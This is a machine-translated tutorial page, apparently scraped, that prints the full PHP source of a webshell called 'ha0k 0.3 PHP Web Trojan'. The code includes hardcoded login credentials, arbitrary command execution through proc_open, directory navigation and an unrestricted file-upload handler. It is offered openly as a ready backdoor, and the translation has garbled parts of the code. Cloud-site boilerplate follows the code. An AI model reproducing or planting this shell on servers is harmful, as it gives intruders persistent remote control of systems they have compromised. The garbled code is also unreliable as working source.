ha0k 0.3 PHP Web Trojan modified version _php tutorial

Source: Internet
Author: User
Tags ereg
Copy CodeThe code is as follows:
Here you can set up multiple users
$passwd = Array (' ha0k ' = ' ha0k ',
' HACKERDSB ' = ' HACKERDSB ');
/* Set the alias of the command here */
$aliases = array (' ls ' = ' ipconfig ',
' ll ' = ' ls-lvhf ');
if (!isset ($_server[' Php_auth_user ')) | |! Isset ($_server[' PHP_AUTH_PW ') | |
!isset ($passwd [$_server[' Php_auth_user ']) | |
$passwd [$_server[' Php_auth_user ']]! = $_server[' PHP_AUTH_PW ']) {
Header (' Www-authenticate:basic realm= ' by ha0k "');
Header (' http/1.0 401 Unauthorized ');
$authenticated = false;
}
else {
$authenticated = true;
/* Start Session */
Session_Start ();
/* Initialize session. */
if (Empty ($_session[' CWD ')) | |!empty ($_request[' reset ')) {
$_session[' cwd '] = GETCWD (); Fetch current Directory
$_session[' History ' = Array ();
$_session[' output ' = ';
}
if (!empty ($_request[' command ')) {
if (GET_MAGIC_QUOTES_GPC ()) {//0 table closed, 1 table open, filter on open
/* We don ' t want to add the commands to the
* Escaped form, so we remove the backslashes now. */
$_request[' command '] = stripslashes ($_request[' command '); Returns the string after processing with the addslashes () function as-is
}
/* History */
if ($i = array_search ($_request[' command '), $_session[' history '))!== false)//Find the value in the Save array
unset ($_session[' history '] [$i]); Destroyed
Array_unshift ($_session[' history '), $_request[' command '); the function of the//array_unshift () function is to insert a new element into an array. And this new array will be added to the beginning of the original array. The function eventually returns the array after the new element is inserted.
/* Output ha0k# command */
$_session[' output '. = ' ha0k# '. $_request[' Command ']. "\ n";
/* Initialize the current working directory. */
if (Ereg (' ^[[:blank:]]*cd[[:blank:]]*$ ', $_request[' command ')) {
$_session[' cwd '] = dirname (__file__); Get the directory that is currently located
} elseif (Ereg (' ^[[:blank:]]*cd[[:blank:]]+ ([^;] +) $ ', $_request[' command '], $regs)) {
/* The current command was a ' CD ' command which we had to handle
* As an internal shell command. */
if ($regs [1][0] = = '/') {
/* Absolute path, we use it unchanged. */
$new _dir = $regs [1];
} else {
/* Relative path, we append it to the current working
* Directory. */
$new _dir = $_session[' CWD '). '/' . $regs [1];
}
/* Transform '/./' into '/' * *
while (Strpos ($new _dir, '/./')!== false)
$new _dir = str_replace ('/./', '/', $new _dir);
/* Transform '//' into '/' * *
while (Strpos ($new _dir, '//')!== false)
$new _dir = Str_replace ('//', '/', $new _dir);
/* Transform ' x/. ' Into ' * *
while (Preg_match (' |/\.\. \.) | ', $new _dir))
$new _dir = preg_replace (' |/?[ ^/]+/\.\. (?! \.) | ', ', $new _dir);
if ($new _dir = = ") $new _dir = '/';
/* Try to change directory. */
if (@chdir ($new _dir)) {//Change the current directory
$_session[' cwd '] = $new _dir;
} else {
$_session[' output '. = "Cd:could not change to: $new _dir\n";
}
} else {
/* The command isn't a ' CD ' command, so we execute it after
* Changing the directory and save the output. */
ChDir ($_session[' CWD '); Change Directory
/* Alias extension */
$length = strcspn ($_request[' command '), "\ t"); Find \ t string, return position
$token = substr ($_request[' command '), 0, $length); Take string 0-\t
if (Isset ($aliases [$token]))
$_request[' command '] = $aliases [$token]. substr ($_request[' command '), $length);
$p = proc_open ($_request[' command '),//Execute script
Array (1 = = Array (' Pipe ', ' w '),
2 = = Array (' Pipe ', ' w ')),
$io);
/* read out Send */
while (!feof ($io [1])) {
$_session[' output '. = Htmlspecialchars (Fgets ($io [1]),//convert special characters to HTML character encoding
Ent_compat, ' GB2312 ');
}
/* read out */
while (!feof ($io [2])) {
$_session[' output '. = Htmlspecialchars (Fgets ($io [2]),
Ent_compat, ' GB2312 ');
}
Fclose ($io [1]);
Fclose ($io [2]);
Proc_close ($p);//Close pipe
}
}
/* Build in JavaScript using command history */
if (Empty ($_session[' history '))) {
$js _command_hist = ' "";
} else {
$escaped = Array_map (' addslashes ', $_session[' history ');
$js _command_hist = ' "", "'. Implode (' "," ', $escaped). ' "'; /make an array into a string
}
}
Header (' content-type:text/html; charset=gb2312 ');
Echo ' ' . "\ n";
?>
if (Is_uploaded_file ($HTTP _post_files[' userfile ' [' tmp_name '])) {
Copy ($HTTP _post_files[' userfile ' [' tmp_name '], $_post[' remotefile ']);
echo "Upload file succeeded:". $HTTP _post_files[' userfile ' [' name '];
}
?>
"Http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd" >


<title>ha0k Webshell</title>






ha0k


WE JUST for Justice,fight for evial



You failed to authenticate yourself to Phpshell. You can href= " " >reload to try again.


Try reading the INSTALL file if you ' re has
Problems with installing Phpshell.




Exit
}
Error_reporting (E_all);
if (Empty ($_request[' rows '))) $_request[' rows '] = 10;
?>

The current directory is:







McAfee (Mccafés Antivirus) prevents web pages from being mounted on the horse's setup tutorial (finally do not open on the server side) we strongly recommend that the server install the McAfee 8.5i version

The world's smallest PHP Trojan horse with a way to prevent the PHP trojan

http://www.bkjia.com/PHPjc/320598.html www.bkjia.com true http://www.bkjia.com/PHPjc/320598.html techarticle Copy the code as follows:? PHP//Here you can set multiple users $passwd = Array (' ha0k ' = ' ha0k ', ' hackerdsb ' = ' HACKERDSB ');/* This sets the alias of the command */$aliases = Arra Y (' ls ' = ' ...

  • Contact Us

    The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

    If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

    A Free Trial That Lets You Build Big!

    Start building with 50+ products and up to 12 months usage for Elastic Compute Service

    • Sales Support

      1 on 1 presale consultation

    • After-Sales Support

      24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.